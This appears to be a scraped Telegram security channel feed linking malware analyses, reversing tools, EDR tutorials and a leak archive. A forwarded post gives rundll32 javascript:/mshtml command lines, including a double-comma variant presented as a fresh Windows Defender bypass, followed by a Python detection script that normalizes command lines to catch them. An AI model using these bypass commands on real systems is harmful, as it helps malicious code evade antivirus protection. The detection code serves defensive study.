Reverse engineering of Android Phoenix RAT
Analysis: link
Phoenix overview: link
#malware_analysis
———
@islemolecule_source
Medium
Reverse engineering of Android/Phoenix
Android/Phoenix is a malicious Remote Access Tool. Its main goal is to extensively spy on the victim’s phone (grab all screenshots, steal…
Forwarded from Proxy Bar
Windows Defender Detection Mitigation Bypass Vulnerability
Win LPE
In 2022 hyp3rlinx showed how to bypass Windows Defender by passing an extra path when referencing mshtml; the hole was fixed. BUT add a couple of commas to the old trick and it bypasses again. *
So, this is what existed and got fixed:
C:\sec>rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)
Comma magic:
C:\sec>rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)
Old dog, new tricks.
No CVE yet )
#defender #bypass
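An added example, not code from the Proxy Bar post and not Defender's own logic: a small Python check over constructed rundll32 command lines. It shows why a literal signature on the 2022 string misses the double-comma variant, and a normalizing matcher (the collapsing rules are my assumption about what a robust detection should tolerate) that catches the original, the comma variant and a spacing/case variant while leaving benign rundll32 calls alone.

```python
import re

# Constructed sample process command lines (not real telemetry): the
# 2022 form of the rundll32/mshtml trick, the double-comma variant from
# the post, a spacing/case variant, and two benign rundll32 invocations.
SAMPLES = [
    r'rundll32.exe javascript:"\..\..\mshtml,RunHTMLApplication ";alert(666)',
    r'rundll32.exe javascript:"\..\..\mshtml,,RunHTMLApplication ";alert(666)',
    r'C:\Windows\System32\RUNDLL32.EXE JavaScript : "\..\..\MSHTML , , RunHTMLApplication ";alert(1)',
    r'rundll32.exe shell32.dll,Control_RunDLL',
    r'rundll32.exe mshtml.dll,PrintHTML "C:\doc.htm"',
]


def naive_literal_match(cmdline: str) -> bool:
    """Signature on the exact 2022 string: brittle, as the post shows."""
    return "mshtml,RunHTMLApplication" in cmdline


def normalize(cmdline: str) -> str:
    """Canonicalise the command line before matching.

    The post shows rundll32 still resolves the export when the comma
    separator is doubled, so a signature must not depend on the exact
    separator. Assumed normalisation: drop quotes, collapse any run of
    commas (and whitespace around them) to one comma, squeeze whitespace.
    """
    s = cmdline.replace('"', "")
    s = re.sub(r"\s*,[\s,]*", ",", s)
    s = re.sub(r"\s+", " ", s)
    return s.strip()


# After normalize(): single spaces, no quotes, single commas.
_RUNDLL32 = re.compile(r"(?:^|[\\/ ])rundll32(?:\.exe)?\b", re.IGNORECASE)
_JS_HANDLER = re.compile(r"\bjavascript\s*:", re.IGNORECASE)
_MSHTML_RUNHTA = re.compile(r"mshtml\s*,\s*RunHTMLApplication\b", re.IGNORECASE)


def is_rundll32_js_mshtml(cmdline: str) -> bool:
    """True when rundll32 is driven through the javascript: handler into
    mshtml's RunHTMLApplication export, regardless of comma/space/case."""
    n = normalize(cmdline)
    return bool(
        _RUNDLL32.search(n) and _JS_HANDLER.search(n) and _MSHTML_RUNHTA.search(n)
    )


def scan(cmdlines):
    """Return the command lines that match the normalized rule."""
    return [c for c in cmdlines if is_rundll32_js_mshtml(c)]


if __name__ == "__main__":
    for c in SAMPLES:
        print(f"naive={naive_literal_match(c)!s:5} "
              f"normalized={is_rundll32_js_mshtml(c)!s:5}  {c}")
```

Run it and the naive signature fires only on the first sample, while the normalized rule fires on the first three and stays quiet on the two benign lines; the same normalize-then-match shape applies to any telemetry field (Sysmon EventID 1 CommandLine, EDR process events) where the attacker controls the separator characters.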
NullSection - An Anti-Reversing Tool That Applies A Technique That Overwrites The Section Header With Nullbytes
Link
#reverse
———
@islemolecule_source
Take a look into the depths of
Windows kernels and
reveal more than 60000
undocumented structures
https://www.vergiliusproject.com/kernels
#windows
———
@islemolecule_source
Malware research community repo
https://github.com/Malware-Research/Resources
#malware_analysis
____
@islemolecule_source
GitHub
GitHub - Malware-Research/Resources: Collection of resources that are made by the Malware Research community
Collection of resources that are made by the Malware Research community - Malware-Research/Resources
Forwarded from Source Byte (Anastasia 🐞)
[ 1 ] From a Windows driver to a fully functional driver.
In this blogpost we'll go through the history of EDRs, how they used to work, how they work now and how we can build a fully functional one. Last step is a chall, bypass MyDumbEDR.
https://sensepost.com/blog/2024/sensecon-23-from-windows-drivers-to-an-almost-fully-working-edr/
[ 2 ] internal mechanisms of EDRs:
https://www.youtube.com/watch?v=yacpjV6kWpM&t=387s
[ 3 ] MyDumbEDR (written in C)
https://github.com/sensepost/mydumbedr
———
@islemolecule_source
The comprehensive HyperDbg training course has been published on YouTube. It is definitely much better to register on the OpenSecurityTraining website and follow the course there, because there is a series of labs and additional instructions on their website:
https://ost2.fyi/Dbg3301
Here is the YouTube playlist link:
https://www.youtube.com/watch?v=RDlp0PCFgxI&list=PLUFkSN0XLZ-kF1f143wlw8ujlH2A45nZY
Slides link:
https://gitlab.com/opensecuritytraining/dbg3301_hyperdbg_slides_and_files
If you have any feedback, I will be happy to share it with you. 🙏
(sina ✍)
Forwarded from vx-underground
tl;dr archived stuff, see link below
Earlier today a GitHub user named "I-S00N" leaked supposedly sensitive Chinese government data - specifically related to offensive cyber security.
The initial discovery, and documentation of the documents, derive from AzakaSekai_. We have archived his research and notes on the material.
It should be noted that they *probably have not covered the material in totality and more information can be expected to be released in the following days from either Azaka, or other Cyber Threat Intelligence experts familiar with Chinese state-sponsored activity.
Furthermore, the materials are written in Mandarin. We have made no attempt to translate the material to English and we do not speak Mandarin, hence we cannot provide any opinion or speculation on the material. We will leave that painstaking task to individuals who speak Mandarin, or people who feel like trying to translate the documents accurately.
What an exciting start to the week:)
You can view the archived materials here: https://vx-underground.org/APTs/2024/2024.02.18%20-%20Summary%20of%20I-S00N%20leaks
Vx Underground
The largest collection of malware source code, samples, and papers on the internet.